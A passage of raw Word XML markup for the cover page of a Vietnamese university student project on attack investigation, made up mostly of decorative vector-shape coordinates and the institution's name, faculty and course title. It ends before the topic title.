                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,34;10,34;0,30;0,21;5,8;16,0;16,34" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 321" o:spid="_x0000_s1345" style="position:absolute;left:7830;top:3412;width:93;height:43;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m93,13r,9l93,30,77,43r-10,l56,43r-5,l56,39,67,30r5,-4l72,17r-21,l36,22,10,43,,43,,39,10,22,20,13,36,4,51,,77,,93,13xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="93,13;93,22;93,30;77,43;67,43;56,43;51,43;56,39;67,30;72,26;72,17;51,17;36,22;10,43;0,43;0,43;0,39;10,22;20,13;36,4;51,0;77,0;93,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 322" o:spid="_x0000_s1346" style="position:absolute;left:7623;top:3438;width:1;height:4;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m,l,4,,xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;0,4;0,0" o:connectangles="0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 323" o:spid="_x0000_s1347" style="position:absolute;left:7809;top:3468;width:62;height:44;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m62,18l57,31,46,44r-5,l41,35r,-9l41,18r,-5l31,18r-5,4l15,26,,31,,22,,13,21,5,41,r5,l57,5r5,13xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="62,18;57,31;46,44;41,44;41,35;41,26;41,18;41,13;31,18;26,22;15,26;0,31;0,22;0,13;21,5;41,0;46,0;57,5;62,18" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 324" o:spid="_x0000_s1348" style="position:absolute;left:8145;top:3473;width:26;height:17;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" path="m26,8r,9l21,17,,17,,8,5,,15,,26,8xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,8;26,17;21,17;0,17;0,8;5,0;15,0;26,8" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 325" o:spid="_x0000_s1349" style="position:absolute;left:7587;top:3490;width:465;height:957;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="46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" path="m465,13l423,26,382,39,341,61,305,82r-37,26l243,139r-26,30l191,204r-16,34l160,299r-11,65l149,485,15,489r-5,5l10,914r,43l,953,,870,,476r62,-4l129,472r,-9l129,377r10,-74l149,264r11,-39l181,191r25,-39l258,100,315,56,351,39,387,22,423,9,460,r5,13xe" fillcolor="#ff7f00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="465,13;423,26;382,39;341,61;305,82;268,108;243,139;217,169;191,204;175,238;160,299;149,364;149,485;15,489;10,494;10,914;10,957;0,953;0,870;0,476;62,472;129,472;129,463;129,377;139,303;149,264;160,225;181,191;206,152;258,100;315,56;351,39;387,22;423,9;460,0;465,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 326" o:spid="_x0000_s1350" style="position:absolute;left:7618;top:3503;width:584;height:996;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="58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" path="m584,30r,l527,39r-52,9l418,61,372,78r-47,26l284,130r-36,39l222,212r-21,31l191,282r-5,77l181,515,41,520r-5,4l36,762,31,987r-6,9l20,996r-5,l5,983r,-17l,935,,494r5,-5l134,485r5,-4l139,420r,-61l144,303r16,-56l186,195r31,-52l263,100,289,78,320,61,351,48,387,35,449,17,568,r16,30xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="584,30;584,30;527,39;475,48;418,61;372,78;325,104;284,130;248,169;222,212;201,243;191,282;186,359;181,515;41,520;36,524;36,762;31,987;25,996;20,996;15,996;5,983;5,966;0,935;0,494;5,489;134,485;139,481;139,420;139,359;144,303;160,247;186,195;217,143;263,100;289,78;320,61;351,48;387,35;449,17;568,0;584,30" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 327" o:spid="_x0000_s1351" style="position:absolute;left:8284;top:3512;width:37;height:30;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m37,17r,13l26,30r-5,l16,30,,,16,8r21,9xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="37,17;37,30;26,30;21,30;16,30;0,0;16,8;37,17" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 328" o:spid="_x0000_s1352" style="position:absolute;left:8300;top:3529;width:176;height:152;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="17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" path="m176,22l145,35r-16,l108,35,93,26r-10,l72,30r,5l72,39r36,13l124,65r10,13l145,121r-16,-4l103,117,88,108,72,95,62,87,57,74,52,65,36,56r,5l41,82r5,31l36,134,21,152,10,143,5,134,,108,10,56r,-17l15,35,26,30r10,l46,26,41,13,46,4,93,r21,l139,r37,22xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="176,22;145,35;129,35;108,35;93,26;83,26;72,30;72,35;72,39;108,52;124,65;134,78;145,121;129,117;103,117;88,108;72,95;62,87;57,74;52,65;36,56;36,61;41,82;46,113;36,134;21,152;10,143;5,134;0,108;10,56;10,39;15,35;26,30;36,30;46,26;41,13;46,4;93,0;114,0;139,0;176,22" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 329" o:spid="_x0000_s1353" style="position:absolute;left:7674;top:3564;width:83;height:60;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m68,21r5,18l83,60r-15,l52,56,31,43,,,31,13r37,8xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="68,21;73,39;83,60;68,60;52,56;31,43;0,0;0,0;31,13;68,21" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 330" o:spid="_x0000_s1354" style="position:absolute;left:8062;top:3620;width:47;height:26;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m47,22l36,26r-15,l,4,16,,31,,47,22xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="47,22;36,26;21,26;0,4;16,0;31,0;47,22" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 331" o:spid="_x0000_s1355" style="position:absolute;left:7736;top:4049;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" path="m26,8r,13l11,26r-5,l,17,6,8,11,,21,4r5,4xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,8;26,21;11,26;6,26;0,17;6,8;11,0;21,4;26,8" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 332" o:spid="_x0000_s1356" style="position:absolute;left:7690;top:4096;width:109;height:52;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m109,48l93,44,78,39,52,22,36,39,26,48,10,52,,52,15,35,26,18,41,,52,,67,,93,22r16,26xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="109,48;93,44;78,39;52,22;36,39;26,48;10,52;0,52;15,35;26,18;41,0;52,0;67,0;93,22;109,48" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 333" o:spid="_x0000_s1357" style="position:absolute;left:7731;top:4144;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" path="m31,13l26,26,16,35,5,26,,17,,13,5,4,16,,26,4r5,5l31,13xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,13;26,26;16,35;5,26;0,17;0,13;5,4;16,0;26,4;31,9;31,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 334" o:spid="_x0000_s1358" style="position:absolute;left:7768;top:4166;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" path="m20,l15,21r-5,5l,26,,21,,13,10,,20,xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,0;15,21;10,26;0,26;0,21;0,13;10,0;20,0" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 335" o:spid="_x0000_s1359" style="position:absolute;left:7705;top:4170;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" path="m26,26l16,22,11,17,,,6,,21,13r5,9l26,26xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,26;16,22;11,17;0,0;6,0;21,13;26,22;26,26" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 336" o:spid="_x0000_s1360" style="position:absolute;left:7742;top:4205;width:20;height:21;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" path="m20,8r-5,9l5,21,,13,,4,5,,15,4r5,4xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,8;15,17;5,21;0,13;0,4;5,0;15,4;20,8" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 337" o:spid="_x0000_s1361" style="position:absolute;left:7742;top:4248;width:20;height:17;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" path="m20,9r-5,4l10,17,,13,5,,15,r5,9xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,9;15,13;10,17;0,13;5,0;15,0;20,9" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 338" o:spid="_x0000_s1362" style="position:absolute;left:7514;top:4456;width:119;height:95;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m114,69r5,26l114,95r-5,l104,86,88,56,78,43,62,26r-10,l42,30,,91,,86,,78,5,69,26,34,52,,73,13,88,30r26,39xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="114,69;119,95;114,95;109,95;104,86;88,56;78,43;62,26;52,26;42,30;0,91;0,86;0,78;5,69;26,34;52,0;73,13;88,30;114,69" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 339" o:spid="_x0000_s1363" style="position:absolute;left:7535;top:4503;width:67;height:100;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6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" path="m62,31r5,17l67,65,52,70,41,78r,5l41,96r-10,4l26,100r,-9l26,78,,65,15,31,31,,41,5r11,8l62,31xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="62,31;67,48;67,65;52,70;41,78;41,83;41,96;31,100;26,100;26,91;26,78;0,65;15,31;31,0;41,5;52,13;62,31" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 340" o:spid="_x0000_s1364" style="position:absolute;left:7457;top:4508;width:37;height:34;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m37,13r,13l26,34,11,30,,21,,13,,8,16,,31,4r6,9xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="37,13;37,26;26,34;11,30;0,21;0,13;0,8;16,0;31,4;37,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 341" o:spid="_x0000_s1365" style="position:absolute;left:7654;top:4512;width:26;height:22;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m26,9r-6,8l15,22,5,22,,13,,4,5,,20,r6,9xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,9;20,17;15,22;5,22;0,13;0,4;5,0;20,0;26,9" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 342" o:spid="_x0000_s1366" style="position:absolute;left:7442;top:4551;width:114;height:234;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m31,17r5,22l41,39r5,-4l46,22r6,-9l57,9r10,4l62,30,52,48r,17l52,74r10,8l67,78r,-9l72,56,77,43,88,30r10,9l98,48,67,87,52,108r,26l57,134r5,l72,108,88,87,98,74r10,l108,78,72,134,57,160,46,190r6,9l62,195,77,152,93,130r21,-17l114,134r-16,9l88,156r,9l88,173r10,17l103,195r5,4l98,208r-10,8l83,225r-6,9l67,234,46,225,36,216,31,203,26,186r,-21l36,121,46,78,41,56,31,39,15,22,,4,5,,15,4,26,9r5,8xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,39;46,35;52,13;67,13;52,48;52,74;67,78;72,56;88,30;98,48;52,108;57,134;72,108;98,74;108,78;57,160;52,199;77,152;114,113;98,143;88,165;98,190;108,199;88,216;77,234;46,225;31,203;26,165;46,78;31,39;0,4;15,4;31,17" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 343" o:spid="_x0000_s1367" style="position:absolute;left:7566;top:4555;width:108;height:230;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m108,5l93,18,83,39,72,57r,21l93,169r,17l83,199,72,217r-10,8l36,230,,195r5,-4l21,186,31,169r5,-4l31,156,21,143,10,135r,-31l21,109r10,13l41,143r16,52l67,195r5,-9l72,174,67,156,46,109,31,91,10,74r,-9l21,61r10,9l41,78r16,26l62,104r,-21l57,70,31,39r,-4l36,31r10,4l52,44r5,4l67,52r,-8l62,31,57,18r5,-5l67,13r21,5l93,5,103,r5,5xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="108,5;93,18;83,39;72,57;72,78;93,169;93,186;83,199;72,217;62,225;36,230;0,195;0,195;5,191;21,186;31,169;36,165;31,156;21,143;10,135;10,104;21,109;31,122;41,143;57,195;67,195;72,186;72,174;67,156;46,109;31,91;10,74;10,65;21,61;31,70;41,78;57,104;62,104;62,83;57,70;31,39;31,35;36,31;46,35;52,44;57,48;67,52;67,44;62,31;57,18;62,13;67,13;88,18;93,5;103,0;108,5" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 344" o:spid="_x0000_s1368" style="position:absolute;left:7530;top:4772;width:57;height:43;visibility:visible;mso-wrap-style:square;v-text-anchor:top"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" path="m57,43l,43,5,34,10,21,26,r5,l36,4,57,21r,13l57,43xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,43;0,43;5,34;10,21;26,0;31,0;31,0;36,4;57,21;57,34;57,43" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 345" o:spid="_x0000_s1369" style="position:absolute;left:7514;top:4837;width:98;height:8;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m98,4r,l47,8,26,8,,4,,,52,,73,,98,4xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="98,4;98,4;47,8;26,8;0,4;0,0;52,0;73,0;98,4" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 346" o:spid="_x0000_s1370" style="position:absolute;left:7488;top:4863;width:161;height:30;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m161,13r-6,8l145,30,11,30,,21,,8,11,,140,r10,l161,13xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="161,13;155,21;145,30;11,30;0,21;0,8;11,0;140,0;150,0;161,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 347" o:spid="_x0000_s1371" style="position:absolute;left:7519;top:4915;width:99;height:8;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m99,8l47,8,,8,,4,47,,99,4r,4xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="99,8;47,8;0,8;0,4;47,0;99,4;99,8" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 348" o:spid="_x0000_s1372" style="position:absolute;left:7855;top:3161;width:68;height:52;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m42,l57,35,68,48r,4l62,52,31,39,,30,,26,11,22,21,9,26,r5,l42,xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="42,0;57,35;68,48;68,52;62,52;31,39;0,30;0,26;11,22;21,9;26,0;31,0;42,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                  </v:group>
                </v:group>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4346AA2E" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5245"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>TRƯỜNG ĐẠI HỌC NGOẠI NGỮ - TIN HỌC TP. HỒ CHÍ MINH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB8978" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5245"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>KHOA CÔNG NGHỆ THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D58381" w14:textId="6886AF6E" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="0030194A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">----- </w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="0099"/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="0026"/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="0098"/>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E22CD91" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F50CEC7" wp14:editId="3A197F23">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2439035</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>213248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1808480" cy="1213485"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:wrapNone/>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596766.nv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1213485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18352E7C" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4519CC" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FB7D47" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F01E24A" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7652EE05" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66823E69" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ĐỒ ÁN MÔN HỌC: ĐIỀU TRA TẤN CÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA12115" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197EDB6D" w14:textId="77777777" w:rsidR="007637F7" w:rsidRPr="00447E87" w:rsidRDefault="007637F7" w:rsidP="007637F7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ĐỀ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TÀI</w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
